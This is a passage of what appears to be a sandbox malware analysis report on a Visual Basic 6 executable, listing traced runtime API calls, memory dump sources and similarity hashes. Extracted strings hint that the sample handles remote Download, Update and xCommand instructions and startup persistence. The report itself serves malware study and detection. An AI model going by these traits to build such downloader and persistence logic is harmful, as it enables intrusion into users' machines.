                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                                                  • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                                                  • API String ID: 3601514899-954089795
                                                                                                                                                                                  • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                                                  • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00411206
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0041120A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411222
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411231
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411243
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411252
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411255
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 0041128E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411299
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004112A1
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004112AD
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411471
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041147A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041147E
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00411495
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004112DE
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004112C4
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411323
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00411326
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411339
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00411355
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00411364
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 00411370
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
                                                                                                                                                                                  • #525.MSVBVM60(00001000), ref: 00411385
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411390
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411398
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 0041139B
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004113D2
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004113E3
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
                                                                                                                                                                                  • #598.MSVBVM60 ref: 00411404
                                                                                                                                                                                  • #525.MSVBVM60(-00000001), ref: 00411424
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041142F
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411437
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00411448
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
                                                                                                                                                                                  • #598.MSVBVM60 ref: 0041145E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004114A9
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0040EB1A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                                                    • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                                                    • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004114BD
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004114C5
                                                                                                                                                                                  • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004114ED
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 004114F0
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 004114F9
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041150F
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00411518
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041151D
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 00411520
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 00411529
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00411572), ref: 00411560
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00411565
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041156A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0041156F
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00411589
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 936154001-0
                                                                                                                                                                                  • Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                                                  • Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
                                                                                                                                                                                  • Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040C00B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,004025E6), ref: 0040C030
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                    • Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,00000000,004025E6), ref: 0040C072
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,004025E6), ref: 0040C096
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C12C
                                                                                                                                                                                  • __vbaNew.MSVBVM60(0040564C), ref: 0040C13E
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C197
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040C1C2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040C238
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040C252
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040C259
                                                                                                                                                                                  • #529.MSVBVM60(00000008), ref: 0040C26D
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
                                                                                                                                                                                  • String ID: RO$C$Once$Start
                                                                                                                                                                                  • API String ID: 3306888832-2962527757
                                                                                                                                                                                  • Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                                                  • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                                                                                                  • Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                    • Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
                                                                                                                                                                                  • #525.MSVBVM60(00000104), ref: 0040AFEC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040AFF7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 0040B0D4
                                                                                                                                                                                  • #616.MSVBVM60(?,?), ref: 0040B0E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040B0F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 0040B111
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 0040B118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040B123
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B17F
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B1BD
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 0040B257
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B2DB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040B2F3
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 0040B312
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 0040B324
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B399
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040B3B2
